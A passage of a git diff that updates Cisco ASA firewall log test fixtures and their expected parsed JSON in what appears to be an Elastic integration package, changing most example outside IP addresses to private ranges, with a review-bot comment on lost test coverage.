09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit 
[0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query -Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 
2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 : %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80) 
-Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to 
dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : 
%ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic 
-Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside -Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username) +Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic 
from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside +Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username) diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json index 7a2fdcad80c..686cc9c87b3 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, 
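Review bot: Almost every `outside:`/`dst outside:` address in the new sample moves from the reserved ranges `192.0.2.0/24` and `192.0.0.0/24` into RFC 1918 space (`192.168.0.x`, `192.168.2.x`, `192.168.99.x`), so the fixture no longer carries a public address on the outside interface except in the final `Jan 13 2021` line (`81.2.69.144`). If the ASA pipeline applies any public/private-dependent enrichment (geo lookup, `network.direction`, internal/external tagging), that path is now exercised by a single record; reusing the public addresses from the changelog's "supported subset" on a handful of the `outside:` entries would preserve that coverage without reintroducing the unsupported ranges. The rewritten `Sep 12 2014 06:53:01` line also carries over the stray trailing `"` after `[0x0, 0x0]` from the old line — worth confirming it is deliberate malformed input rather than a paste artifact, since the expected output for that record will encode whatever the parser does with it.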
@@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672304618Z", - "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:32:11.534937100Z", + "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672398079Z", - "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:32:11.534941700Z", + "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, 
@@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672402326Z", - "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.534947900Z", + "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672404806Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:32:11.534954500Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { 
@@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672406643Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:32:11.534960200Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672408379Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:32:11.534965800Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" 
@@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672410128Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:32:11.534971700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672411932Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:32:11.534977400Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672413702Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:32:11.534983100Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672415481Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:32:11.534988700Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" 
@@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672417225Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:32:11.534994300Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-07-19T09:06:19.672419500Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:32:11.535000400Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-07-19T09:06:19.672421418Z", - "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:32:11.535006100Z", + "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.672423189Z", + "ingested": "2021-12-09T13:32:11.535011800Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1016,8 +1016,8 @@ }, "destination": { "port": 10879, - "address": "192.0.0.130", - "ip": "192.0.0.130" + "address": "192.168.0.130", + "ip": "192.168.0.130" }, "source": { "port": 4954, @@ 